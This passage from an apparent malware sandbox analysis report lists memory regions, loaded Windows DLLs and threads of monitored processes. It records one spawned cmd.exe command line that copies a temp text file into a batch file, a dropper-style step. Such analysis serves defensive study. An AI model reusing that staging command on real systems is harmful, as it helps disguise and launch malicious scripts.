filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1407
start_va = 0x7fefccc0000
end_va = 0x7fefccc9fff
monitored = 0
entry_point = 0x7fefccc3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 1408
start_va = 0x7fefccd0000
end_va = 0x7fefccdcfff
monitored = 0
entry_point = 0x7fefccd1348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 1409
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1410
start_va = 0x7fefceb0000
end_va = 0x7fefcedffff
monitored = 0
entry_point = 0x7fefceb194c
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1411
start_va = 0x7fefcee0000
end_va = 0x7fefcf3afff
monitored = 0
entry_point = 0x7fefcee6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1412
start_va = 0x7fefd050000
end_va = 0x7fefd056fff
monitored = 0
entry_point = 0x7fefd05142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1413
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1414
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1415
start_va = 0x7fefd1d0000
end_va = 0x7fefd201fff
monitored = 0
entry_point = 0x7fefd1d144c
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1416
start_va = 0x7fefd210000
end_va = 0x7fefd217fff
monitored = 0
entry_point = 0x7fefd212a6c
region_type = mapped_file
name = "wmsgapi.dll"
filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")
Region:
id = 1417
start_va = 0x7fefd220000
end_va = 0x7fefd229fff
monitored = 0
entry_point = 0x7fefd223b40
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1418
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1419
start_va = 0x7fefd2b0000
end_va = 0x7fefd2defff
monitored = 0
entry_point = 0x7fefd2b1064
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1420
start_va = 0x7fefd2f0000
end_va = 0x7fefd35cfff
monitored = 0
entry_point = 0x7fefd2f1010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1421
start_va = 0x7fefd360000
end_va = 0x7fefd373fff
monitored = 0
entry_point = 0x7fefd364160
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 1422
start_va = 0x7fefd5c0000
end_va = 0x7fefd5e2fff
monitored = 0
entry_point = 0x7fefd5c1198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1423
start_va = 0x7fefd660000
end_va = 0x7fefd66afff
monitored = 0
entry_point = 0x7fefd661030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1424
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1425
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1426
start_va = 0x7fefd6d0000
end_va = 0x7fefd760fff
monitored = 0
entry_point = 0x7fefd6d1440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1427
start_va = 0x7fefd770000
end_va = 0x7fefd7acfff
monitored = 0
entry_point = 0x7fefd7718f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1428
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1429
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1430
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1431
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1432
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1433
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1434
start_va = 0x7fefd9f0000
end_va = 0x7fefda2afff
monitored = 0
entry_point = 0x7fefd9f1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1435
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1436
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1437
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1438
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1439
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1440
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1441
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1442
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1443
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1444
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1445
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1446
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1447
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1448
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1449
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1450
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1451
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1452
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1453
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1454
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1455
start_va = 0x7fffff58000
end_va = 0x7fffff59fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff58000"
filename = ""
Region:
id = 1456
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 1457
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 1458
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 1459
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 1460
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 1461
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 1462
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 1463
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 1464
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 1465
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 1466
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 1467
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 1468
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 1469
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 1470
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 1471
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 1472
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 1473
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 1474
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 1475
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 1476
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1477
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1478
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1479
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1480
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1481
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1482
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1483
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1484
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1485
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1486
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1487
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 2339
start_va = 0x29e0000
end_va = 0x2afdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "aero.msstyles"
filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles")
Region:
id = 2340
start_va = 0x5150000
end_va = 0x5b4ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005150000"
filename = ""
Region:
id = 2341
start_va = 0x5b50000
end_va = 0x654ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005b50000"
filename = ""
Region:
id = 2342
start_va = 0x2530000
end_va = 0x260efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 2343
start_va = 0x2530000
end_va = 0x260efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 2344
start_va = 0x2530000
end_va = 0x260efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002530000"
filename = ""
Region:
id = 2345
start_va = 0x8b0000
end_va = 0x8bffff
monitored = 0
entry_point = 0x8b3e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2350
start_va = 0x8c0000
end_va = 0x8c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2603
start_va = 0x8b0000
end_va = 0x8d3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 2605
start_va = 0xf90000
end_va = 0x100ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f90000"
filename = ""
Region:
id = 2606
start_va = 0x1fa0000
end_va = 0x201ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fa0000"
filename = ""
Region:
id = 2607
start_va = 0x20d0000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020d0000"
filename = ""
Region:
id = 2608
start_va = 0x2590000
end_va = 0x260ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 2609
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 2610
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 2611
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 2612
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 2821
start_va = 0x8b0000
end_va = 0x8b2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 2944
start_va = 0x8b0000
end_va = 0x8b5fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 3390
start_va = 0x8b0000
end_va = 0x8b2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 3391
start_va = 0x8b0000
end_va = 0x8b7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 3512
start_va = 0x8b0000
end_va = 0x8b5fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Region:
id = 3685
start_va = 0x8b0000
end_va = 0x8b2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008b0000"
filename = ""
Thread:
id = 48
os_tid = 0xb7c
Thread:
id = 49
os_tid = 0xfdc
Thread:
id = 50
os_tid = 0xfc4
Thread:
id = 51
os_tid = 0x910
Thread:
id = 52
os_tid = 0xf50
Thread:
id = 53
os_tid = 0xf4c
Thread:
id = 54
os_tid = 0xf44
Thread:
id = 55
os_tid = 0x80c
Thread:
id = 56
os_tid = 0x7f4
Thread:
id = 57
os_tid = 0x68c
Thread:
id = 58
os_tid = 0x5f0
Thread:
id = 59
os_tid = 0x600
Thread:
id = 60
os_tid = 0x31c
Thread:
id = 61
os_tid = 0x47c
Thread:
id = 62
os_tid = 0x318
Thread:
id = 63
os_tid = 0x658
Thread:
id = 64
os_tid = 0x634
Thread:
id = 65
os_tid = 0x624
Thread:
id = 66
os_tid = 0x604
Thread:
id = 67
os_tid = 0x5f8
Thread:
id = 68
os_tid = 0x5e8
Thread:
id = 69
os_tid = 0x460
Thread:
id = 70
os_tid = 0x45c
Thread:
id = 71
os_tid = 0x150
Thread:
id = 72
os_tid = 0x144
Thread:
id = 73
os_tid = 0x458
Thread:
id = 74
os_tid = 0x454
Thread:
id = 75
os_tid = 0x44c
Thread:
id = 76
os_tid = 0x3f0
Thread:
id = 77
os_tid = 0x3e4
Thread:
id = 78
os_tid = 0x388
Thread:
id = 79
os_tid = 0x378
Thread:
id = 80
os_tid = 0x370
Thread:
id = 136
os_tid = 0xdf8
Thread:
id = 137
os_tid = 0xdb0
Thread:
id = 138
os_tid = 0xe88
Thread:
id = 139
os_tid = 0xda0
Process:
id = "6"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x22f35000"
os_pid = "0xb48"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x384"
cmd_line = "cmd.exe /c \"copy /y \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\" & timeout 1\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1551
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1552
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1553
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1554
start_va = 0x1b0000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1555
start_va = 0x4a250000
end_va = 0x4a2a8fff
monitored = 1
entry_point = 0x4a2590b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 1556
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1557
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1558
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1559
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1560
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1561
start_va = 0x7fffffda000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 1562
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 1563
start_va = 0x50000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1564
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1565
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1566
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1567
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1568
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1569
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1570
start_va = 0x2b0000
end_va = 0x316fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1571
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1572
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
